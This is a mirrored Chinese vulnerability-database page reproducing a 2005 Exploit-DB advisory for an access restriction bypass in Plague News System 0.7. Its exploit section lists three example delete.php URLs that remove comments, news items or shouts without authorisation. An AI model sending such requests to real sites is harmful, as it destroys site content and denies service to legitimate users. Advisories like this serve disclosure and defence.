Plague News System 0.7 – ‘delete.php’ Access Restriction Bypass

Plague News System 0.7 – ‘delete.php’ Access Restriction Bypass

漏洞ID 1055215 漏洞类型
发布时间 2005-07-04 更新时间 2005-07-04
图片[1]-Plague News System 0.7 – ‘delete.php’ Access Restriction Bypass-安全小百科CVE编号 N/A
图片[2]-Plague News System 0.7 – ‘delete.php’ Access Restriction Bypass-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25937
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14139/info

Plague News System is prone to an access restriction bypass vulnerability. The issue exists due to a lack of sanity checks performed by 'delete.php' on deletion requests passed to the script.

A remote attacker may exploit this issue to delete site content and deny service for legitimate users. 

http://www.example.com/delete.php?comment=1&id=[ID of comment here]
http://www.example.com/delete.php?news=1&id=[ID of news here]
http://www.example.com/delete.php?shout=1&id=[ID of shout here]

相关推荐: iGeneric Shop 多参数SQL注入漏洞

iGeneric Shop 多参数SQL注入漏洞 漏洞ID 1200111 漏洞类型 SQL注入 发布时间 2005-02-21 更新时间 2005-02-21 CVE编号 CVE-2005-0537 CNNVD-ID CNNVD-200502-074 漏洞平…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享